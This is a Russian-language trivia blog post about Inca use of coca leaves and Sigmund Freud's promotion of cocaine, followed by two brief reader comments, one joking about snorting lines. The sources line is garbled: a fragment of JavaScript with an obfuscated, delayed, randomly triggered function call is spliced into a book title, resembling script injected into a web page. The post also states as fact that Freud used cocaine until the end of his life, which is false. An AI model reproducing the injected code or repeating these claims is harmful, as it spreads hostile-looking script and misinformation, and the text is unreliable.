Кока без Колы

А знаете ли вы, что инки использовали листья коки в хирургии задолго до того как европейцы открыли анестетические свойства кокаина. Правда, хирурги инков использовали их не для пациента, а для себя – жевание листьев коки поддерживало концентрацию и бодрость при долгих операциях.

Кстати, широкая известность кокаина в Европе связана, в том числе, с одним из самых известных врачей мира – Зигмундом Фрейдом. Фрейд, занимавшийся медицинскими исследованиями, стал одним из самых первых «пользователей» и сторонников кокаина. Он называл его отличным стимулянтом и анальгетиком, и считал средством от большого числа психических и физических болезней. Этому, в том числе была посвящена в 1884 году его работа «На коке». Также, Фрейд рекомендовал кокаин для борьбы с морфиновой зависимостью. Все эти взгляды он достаточно последовательно излагал в своих статьях еще несколько лет.

Интересно, что Фрейд практически совсем упустил из внимания использование кокаина в качестве анестетика – т.е. то, что в последствие было признано одним из немногих более менее безопасных использований этого сильного вещества. Сам же Фрейд, до конца жизни использовал кокаин от депрессии, мигреней и инфекций в носоглотке.

Интересные факты: E.Barrett & J.Mingo. Random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom Kinds of Factness; Wikipedia (Sigmund Freud).
ИнкиМедицинаНаркотикиЮжная Америка
Comments (2)
Add Comment
  • Лео Кулибин

    Это очень интересный факт. Зигмунд Фрейд использовал кокаин от инфекций в носоглотке.

  • гость

    представляю…
    Фрейд такой пару дорожек загнал и нормально!!! бодрячком!!!